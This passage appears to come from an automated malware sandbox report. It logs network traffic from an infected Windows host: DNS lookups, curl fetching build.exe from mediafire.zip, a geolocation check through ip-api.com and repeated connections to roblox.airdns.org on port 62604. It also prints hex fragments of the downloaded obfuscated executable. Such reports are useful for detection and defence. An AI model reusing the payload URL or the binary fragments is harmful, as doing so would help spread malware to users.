                    Jun 9, 2024 01:26:08.428220034 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428246975 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428294897 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428343058 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428369999 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428416014 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428428888 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428451061 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428453922 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428495884 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428541899 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428560972 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428582907 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428618908 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428618908 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428637028 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428661108 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428684950 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428706884 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428716898 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428761959 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428764105 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428795099 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428803921 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428818941 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428838968 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428888083 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.428961992 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.428987026 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429059029 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429059982 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429076910 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429111004 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429132938 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429146051 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429172039 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429193974 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429208994 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429233074 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429274082 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429286003 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429316044 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429337978 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429358006 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429384947 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429428101 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429440975 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429470062 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429476976 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429491043 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429502964 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429528952 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429544926 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429586887 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429598093 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429649115 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429672956 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429725885 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429745913 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429769039 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429775953 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429811954 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429843903 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429857016 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429883003 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429919004 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429948092 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.429960966 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.429975033 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430002928 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430022001 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430056095 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430088997 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430116892 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430156946 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430170059 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430195093 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430203915 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430236101 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430270910 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430284977 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430311918 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430345058 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430346012 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430361986 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430416107 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430423975 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430438995 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430480957 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430501938 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430515051 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430541992 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430608988 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430627108 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430685997 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430696964 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430708885 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430735111 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430754900 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430793047 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430804014 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430852890 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430876017 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430917025 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430932045 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430955887 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.430958033 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.430984020 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.431024075 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.431035995 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.431062937 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.431117058 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:08.431180000 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.475677967 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.852745056 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:08.852826118 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:38.400122881 CEST4974680192.168.2.4208.95.112.1
                    Jun 9, 2024 01:26:38.405121088 CEST8049746208.95.112.1192.168.2.4
                    Jun 9, 2024 01:26:38.405389071 CEST4974680192.168.2.4208.95.112.1
                    Jun 9, 2024 01:26:38.405967951 CEST4974680192.168.2.4208.95.112.1
                    Jun 9, 2024 01:26:38.410846949 CEST8049746208.95.112.1192.168.2.4
                    Jun 9, 2024 01:26:38.994735003 CEST8049746208.95.112.1192.168.2.4
                    Jun 9, 2024 01:26:39.043890953 CEST4974680192.168.2.4208.95.112.1
                    Jun 9, 2024 01:26:39.871294022 CEST4974762604192.168.2.464.42.179.59
                    Jun 9, 2024 01:26:39.876521111 CEST626044974764.42.179.59192.168.2.4
                    Jun 9, 2024 01:26:39.876620054 CEST4974762604192.168.2.464.42.179.59
                    Jun 9, 2024 01:26:48.348987103 CEST626044974764.42.179.59192.168.2.4
                    Jun 9, 2024 01:26:48.349116087 CEST4974762604192.168.2.464.42.179.59
                    Jun 9, 2024 01:26:48.355688095 CEST4974762604192.168.2.464.42.179.59
                    Jun 9, 2024 01:26:48.360630989 CEST626044974764.42.179.59192.168.2.4
                    Jun 9, 2024 01:26:53.905097008 CEST4974862604192.168.2.464.42.179.59
                    Jun 9, 2024 01:26:53.910367966 CEST626044974864.42.179.59192.168.2.4
                    Jun 9, 2024 01:26:53.910499096 CEST4974862604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:02.388626099 CEST626044974864.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:02.388871908 CEST4974862604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:02.389161110 CEST4974862604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:02.394038916 CEST626044974864.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:07.701261044 CEST4975062604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:07.706434965 CEST626044975064.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:07.706558943 CEST4975062604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:15.529736996 CEST8049746208.95.112.1192.168.2.4
                    Jun 9, 2024 01:27:15.529820919 CEST4974680192.168.2.4208.95.112.1
                    Jun 9, 2024 01:27:16.178009033 CEST626044975064.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:16.178225040 CEST4975062604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:16.178965092 CEST4975062604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:16.183861971 CEST626044975064.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:21.761208057 CEST4975162604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:21.766920090 CEST626044975164.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:21.767041922 CEST4975162604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:30.244899988 CEST626044975164.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:30.244990110 CEST4975162604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:30.245237112 CEST4975162604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:30.250122070 CEST626044975164.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:35.513487101 CEST4975262604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:35.518630981 CEST626044975264.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:35.518737078 CEST4975262604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:43.998133898 CEST626044975264.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:43.998321056 CEST4975262604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:43.998955011 CEST4975262604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:44.005341053 CEST626044975264.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:49.466650963 CEST4975362604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:49.471792936 CEST626044975364.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:49.472011089 CEST4975362604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:57.948786020 CEST626044975364.42.179.59192.168.2.4
                    Jun 9, 2024 01:27:57.949003935 CEST4975362604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:57.949100971 CEST4975362604192.168.2.464.42.179.59
                    Jun 9, 2024 01:27:57.954200029 CEST626044975364.42.179.59192.168.2.4
                    Jun 9, 2024 01:28:03.357450008 CEST4975462604192.168.2.464.42.179.59
                    Jun 9, 2024 01:28:03.362804890 CEST626044975464.42.179.59192.168.2.4
                    Jun 9, 2024 01:28:03.363091946 CEST4975462604192.168.2.464.42.179.59
                    Jun 9, 2024 01:28:11.835977077 CEST626044975464.42.179.59192.168.2.4
                    Jun 9, 2024 01:28:11.836078882 CEST4975462604192.168.2.464.42.179.59
                    Jun 9, 2024 01:28:11.836608887 CEST4975462604192.168.2.464.42.179.59
                    Jun 9, 2024 01:28:11.841512918 CEST626044975464.42.179.59192.168.2.4
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 9, 2024 01:26:06.736573935 CEST6082753192.168.2.41.1.1.1
                    Jun 9, 2024 01:26:06.769602060 CEST53608271.1.1.1192.168.2.4
                    Jun 9, 2024 01:26:38.384316921 CEST5821153192.168.2.41.1.1.1
                    Jun 9, 2024 01:26:38.392611980 CEST53582111.1.1.1192.168.2.4
                    Jun 9, 2024 01:26:39.764713049 CEST5395053192.168.2.41.1.1.1
                    Jun 9, 2024 01:26:39.863008022 CEST53539501.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jun 9, 2024 01:26:06.736573935 CEST192.168.2.41.1.1.10xd31aStandard query (0)mediafire.zipA (IP address)IN (0x0001)false
                    Jun 9, 2024 01:26:38.384316921 CEST192.168.2.41.1.1.10x77f4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                    Jun 9, 2024 01:26:39.764713049 CEST192.168.2.41.1.1.10x7735Standard query (0)roblox.airdns.orgA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jun 9, 2024 01:26:06.769602060 CEST1.1.1.1192.168.2.40xd31aNo error (0)mediafire.zip172.67.195.64A (IP address)IN (0x0001)false
                    Jun 9, 2024 01:26:06.769602060 CEST1.1.1.1192.168.2.40xd31aNo error (0)mediafire.zip104.21.12.186A (IP address)IN (0x0001)false
                    Jun 9, 2024 01:26:38.392611980 CEST1.1.1.1192.168.2.40x77f4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                    Jun 9, 2024 01:26:39.863008022 CEST1.1.1.1192.168.2.40x7735No error (0)roblox.airdns.org64.42.179.59A (IP address)IN (0x0001)false
                    • mediafire.zip
                    • ip-api.com
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449746208.95.112.1808136C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                    TimestampBytes transferredDirectionData
                    Jun 9, 2024 01:26:38.405967951 CEST144OUTGET /json/ HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                    Host: ip-api.com
                    Connection: Keep-Alive
                    Jun 9, 2024 01:26:38.994735003 CEST468INHTTP/1.1 200 OK
                    Date: Sat, 08 Jun 2024 23:26:38 GMT
                    Content-Type: application/json; charset=utf-8
                    Content-Length: 291
                    Access-Control-Allow-Origin: *
                    X-Ttl: 60
                    X-Rl: 44
                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d
                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449733172.67.195.644437600C:\Windows\SysWOW64\curl.exe
                    TimestampBytes transferredDirectionData
                    2024-06-08 23:26:07 UTC86OUTGET /build.exe HTTP/1.1
                    Host: mediafire.zip
                    User-Agent: curl/7.83.1
                    Accept: */*
                    2024-06-08 23:26:07 UTC702INHTTP/1.1 200 OK
                    Date: Sat, 08 Jun 2024 23:26:07 GMT
                    Content-Type: application/x-msdownload
                    Content-Length: 3124224
                    Connection: close
                    Last-Modified: Fri, 07 Jun 2024 19:27:50 GMT
                    ETag: "2fac00-61a51cb8db980"
                    Cache-Control: max-age=14400
                    CF-Cache-Status: HIT
                    Age: 4439
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVQxDwpfn6Ln2iqodRfhcpg%2Bn3ZgxIbLX3JMaCo95zpLwJaRwIL7NGx5C6Kpx7uxDuMaD87XtIrF5oFtZ0fexh2f%2B2%2Bew8TYf%2FDc0vTly7qon0YzbkfLB9QLXBPNrQu6"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 890ca521098e6b1c-DFW
                    alt-svc: h3=":443"; ma=86400
                    2024-06-08 23:26:07 UTC667INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e8 6a 82 6c ac 0b ec 3f ac 0b ec 3f ac 0b ec 3f a5 73 7f 3f be 0b ec 3f ca 64 11 3f ad 0b ec 3f fe 7e e8 3e a1 0b ec 3f fe 7e ef 3e b1 0b ec 3f fe 7e ed 3e a8 0b ec 3f 9d 57 11 3f ae 0b ec 3f f9 7e ed 3e ae 0b ec 3f 53 2b e8 3f ae 0b ec 3f fe 7e e9 3e 8a 0b ec 3f f7 63 eb 3e ad 0b ec 3f f7 63 e8 3e a8 0b ec 3f f7 63 ea 3e ad 0b ec 3f f7 63 ed 3e 8b 0b ec 3f ac 0b ed 3f 1d 09 ec
                    Data Ascii: MZ@8!L!This program cannot be run in DOS mode.$jl???s??d??~>?~>?~>?W??~>?S+??~>?c>?c>?c>?c>??
                    2024-06-08 23:26:07 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 00 30 02 00 00 70 21 00 00 2c 02 00 00 e0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 4c 9e 0c 00 00 a0 23 00 00 a0 0c 00 00 0c 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: @_RDATA0p!, @@.rsrcL##@@
                    2024-06-08 23:26:07 UTC1369INData Raw: ea ff ff 0f af 45 d4 6b 55 d4 70 2b c2 89 45 d0 8b 85 64 ea ff ff 0f af 45 d4 89 85 d8 e1 ff ff c7 85 d8 e9 ff ff 01 00 00 00 56 56 83 c4 04 81 f6 68 72 00 00 5e 52 81 ca d0 66 00 00 5a 56 57 83 c4 04 81 ce f7 60 01 00 81 c6 1a e6 00 00 81 ee ad 1b 00 00 81 ce 26 23 01 00 5e 6b 8d d8 e9 ff ff 70 81 c1 3b 66 f3 44 6b 95 d8 e9 ff ff 70 2b ca 33 8d d8 e1 ff ff 0f af 8d d8 e9 ff ff 6b 85 d8 e9 ff ff 70 2b c8 89 8d d4 e9 ff ff 8b 8d 9c ef ff ff 8b 95 a0 ef ff ff 89 8d cc e9 ff ff 89 95 d0 e9 ff ff 52 eb 03 4f 3b 4d 81 f2 66 59 00 00 5a 50 53 83 c4 04 e8 0b 00 00 00 00 38 4a 3e 49 37 3f 3b 37 45 41 83 c4 04 81 e8 84 4c 00 00 81 e0 b3 04 01 00 58 56 81 f6 ad 04 01 00 e8 0b 00 00 00 00 3c 3c 46 36 37 36 4e 43 3f 4d 83 c4 04 5e 51 eb 07 4d 36 48 43 3e 4b 4f 59 52
                    Data Ascii: EkUp+EdEVVhr^RfZVW`&#^kp;fDkp+3kp+RO;MfYZPS8J>I7?;7EALXV<<F676NC?M^QM6HC>KOYR
                    2024-06-08 23:26:07 UTC1369INData Raw: e8 09 00 00 00 00 3d 46 48 41 39 4d 3e 43 83 c4 04 5e 6b 95 c8 e9 ff ff 70 81 c2 3b 66 f3 44 6b 85 c8 e9 ff ff 70 2b d0 81 f2 e6 00 00 00 0f af 95 c8 e9 ff ff 6b 8d c8 e9 ff ff 70 2b d1 89 95 c4 e9 ff ff 53 50 83 c4 04 81 eb dc 78 01 00 81 c3 f0 7e 01 00 81 eb b5 10 01 00 81 c3 d6 0d 00 00 5b 56 81 ee 9a 48 01 00 81 ce e1 64 00 00 81 c6 50 c8 00 00 5e 56 51 83 c4 04 81 c6 81 38 00 00 eb 04 3e 42 36 45 5e 50 52 83 c4 04 81 c0 c5 62 01 00 81 e0 d9 8a 00 00 81 c8 ef 1a 01 00 58 52 81 ca b1 01 00 00 5a 8b 95 54 f6 ff ff 83 c2 70 6b 85 58 f6 ff ff 70 05 3b 66 f3 44 6b 8d 58 f6 ff ff 70 2b c1 33 d0 0f af 95 58 f6 ff ff 89 95 b0 e1 ff ff 8b 95 b0 e1 ff ff 89 95 ac e1 ff ff 8b 85 ac e1 ff ff 83 e8 6e 89 85 a4 e1 ff ff c7 85 8c f5 ff ff 01 00 00 00 51 e8 07 00 00
                    Data Ascii: =FHA9M>C^kp;fDkp+kp+SPx~[VHdP^VQ8>B6E^PRbXRZTpkXp;fDkXp+3XnQ
                    2024-06-08 23:26:07 UTC1369INData Raw: ff 70 81 c2 3b 66 f3 44 6b 85 8c fd ff ff 70 2b d0 33 ca 0f af 8d 8c fd ff ff 89 8d 8c e1 ff ff 8b 8d 8c e1 ff ff 89 8d 88 e1 ff ff 83 bd 88 e1 ff ff 00 0f 86 af 04 00 00 53 81 f3 12 7e 01 00 81 e3 63 dd 00 00 eb 06 38 40 4c 4f 41 33 81 f3 81 00 01 00 5b 50 81 c8 e5 5e 01 00 58 51 81 f1 a9 67 01 00 81 c1 bf c4 00 00 59 8b 95 88 fd ff ff 83 c2 70 6b 85 8c fd ff ff 70 05 3b 66 f3 44 6b 8d 8c fd ff ff 70 2b c1 33 d0 0f af 95 8c fd ff ff 89 95 84 e1 ff ff 8b 95 84 e1 ff ff 89 95 78 e1 ff ff 50 81 c8 e4 02 01 00 81 e8 5b 82 00 00 58 56 51 83 c4 04 81 c6 f5 4e 00 00 81 e6 50 21 00 00 81 f6 4a 6a 00 00 5e 50 57 83 c4 04 81 e8 ed 35 01 00 58 8b 85 88 f5 ff ff 83 c0 70 6b 8d 8c f5 ff ff 70 81 c1 3b 66 f3 44 6b 95 8c f5 ff ff 70 2b ca 33 c1 0f af 85 8c f5 ff ff 89
                    Data Ascii: p;fDkp+3S~c8@LOA3[P^XQgYpkp;fDkp+3xP[XVQNP!Jj^PW5Xpkp;fDkp+3
                    2024-06-08 23:26:07 UTC1369INData Raw: 04 e8 0b 00 00 00 00 46 3f 3a 3c 39 3d 32 35 46 3c 83 c4 04 59 56 eb 04 45 48 50 40 81 ee 47 7f 00 00 5e 8b 95 30 f5 ff ff 8b 02 83 c0 70 8b 8d 30 f5 ff ff 6b 51 04 70 81 c2 3b 66 f3 44 8b 8d 30 f5 ff ff 6b 49 04 70 2b d1 33 c2 8b 95 30 f5 ff ff 0f af 42 04 89 85 48 e1 ff ff 8b 85 48 e1 ff ff 89 85 40 e1 ff ff 8b 8d 44 e1 ff ff 2b 8d 40 e1 ff ff 89 8d 3c e1 ff ff c7 85 80 ef ff ff 01 00 00 00 52 50 83 c4 04 81 c2 86 c3 00 00 eb 07 34 33 35 37 48 3a 34 5a 50 52 83 c4 04 81 e8 de 9d 00 00 e8 09 00 00 00 00 4c 38 37 43 36 48 4b 35 83 c4 04 58 6b 95 80 ef ff ff 70 81 c2 3b 66 f3 44 6b 85 80 ef ff ff 70 2b d0 33 95 3c e1 ff ff 0f af 95 80 ef ff ff 6b 8d 80 ef ff ff 70 2b d1 89 95 7c ef ff ff 8b 95 7c ef ff ff 8b 85 80 ef ff ff 89 55 ec 89 45 f0 53 50 83 c4 04
                    Data Ascii: F?:<9=25F<YVEHP@G^0p0kQp;fD0kIp+30BHH@D+@<RP4357H:4ZPRL87C6HK5Xkp;fDkp+3<kp+||UESP
                    2024-06-08 23:26:07 UTC1369INData Raw: 56 81 e6 c5 31 01 00 5e 50 81 e8 9b 62 01 00 81 e0 05 67 01 00 81 e8 e0 f8 00 00 81 c0 e9 75 01 00 58 53 50 83 c4 04 81 e3 88 41 00 00 81 c3 d6 86 00 00 81 cb 1d 79 01 00 5b c7 85 18 fd ff ff 01 00 00 00 56 50 83 c4 04 81 c6 a6 61 01 00 5e 57 52 83 c4 04 81 c7 c3 9c 00 00 81 e7 93 47 01 00 5f 52 81 ca 20 ce 00 00 81 e2 10 d3 00 00 81 ca b3 9a 00 00 5a 6b 8d 18 fd ff ff 70 81 c1 3b 66 f3 44 6b 95 18 fd ff ff 70 2b ca 83 f1 02 0f af 8d 18 fd ff ff 6b 85 18 fd ff ff 70 2b c8 89 8d 14 fd ff ff 51 eb 04 3e 49 44 43 59 52 53 83 c4 04 81 ea 7b c8 00 00 81 c2 9e 07 01 00 5a 52 51 83 c4 04 81 f2 ef dd 00 00 81 c2 d5 a9 00 00 81 ca b5 9a 00 00 5a 8b 8d 4c f6 ff ff 8b 95 50 f6 ff ff 89 8d 90 fd ff ff 89 95 94 fd ff ff e9 b8 01 00 00 51 56 83 c4 04 81 c9 64 39 01 00
